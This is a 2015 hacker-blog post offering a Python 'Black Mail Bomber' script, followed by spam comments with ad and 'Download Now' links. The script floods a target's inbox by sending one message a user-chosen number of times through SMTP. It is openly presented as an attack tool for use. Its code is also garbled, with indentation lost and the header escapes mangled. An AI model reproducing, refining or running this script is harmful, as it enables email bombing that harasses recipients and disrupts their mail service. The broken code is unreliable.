adse

We are not professional , We make the peoples professional !!

Monday 16 February 2015

[Python] Black mail Bomber script


MAIL BOMBER BY IHC (CYBER HACKER)
#!/usr/bin/env python
# 10/12/09 by Team IHC ::
import smtplib
print “================================”
print “**THIS*IS*THE*BLACK*MAIL*BOMBER*”
print “*CONTACT:*WWW.Facebook.com/itsmehulbhatt*”
print “********05/01/2015**BY**********”
print “**********Cyb3r_h4ck3r***********”
print “================================”
i=0
def prompt(prompt):
return raw_input(prompt).strip()
fromaddr = prompt(“From: “)
toaddrs = prompt(“To: “).split()
mailsent = prompt(“How many mails would you send ? “)
print “Enter message, end with double/triple ‘ENTER’ (Unix & Dos):”
msg = (“From: %srnTo: %srnrn”
% (fromaddr, “, “.join(toaddrs)))
while 1:
try:
line = raw_input()
except EOFError:
break
if not line:
break
msg = msg + line
# print “Message length is ” + repr(len(msg))
while int(i) < int(mailsent):
i = i + 1
server = smtplib.SMTP(‘localhost’)
server.set_debuglevel(0)
server.sendmail(fromaddr, toaddrs, msg)
server.quit()
print “## MAIL-COUNTER ## =”, i

3 comments:

  1. Hey,
    Your article is nice, I like it.
    Thanks for sharing with us.

    Eicher 241

    ReplyDelete
  2. [Python] Black Mail Bomber Script ~ Indian Hacker'S Colony >>>>> Download Now

    >>>>> Download Full

    [Python] Black Mail Bomber Script ~ Indian Hacker'S Colony >>>>> Download LINK

    >>>>> Download Now

    [Python] Black Mail Bomber Script ~ Indian Hacker'S Colony >>>>> Download Full

    >>>>> Download LINK

    ReplyDelete
  3. Very well written article. It was an awesome article to read. Complete rich content and fully informative. I totally Loved it. Wedding Services in Alwar

    ReplyDelete

Donate us ur one click

Like us

Popular Posts

Total Pageviews

Translate

Google Ranking Cross Site Scripting

Copyright © Indian Hacker's Colony | Powered by Blogger
Design by Saeed Salam | Blogger Theme by NewBloggerThemes.com | Distributed By Gooyaabi Templates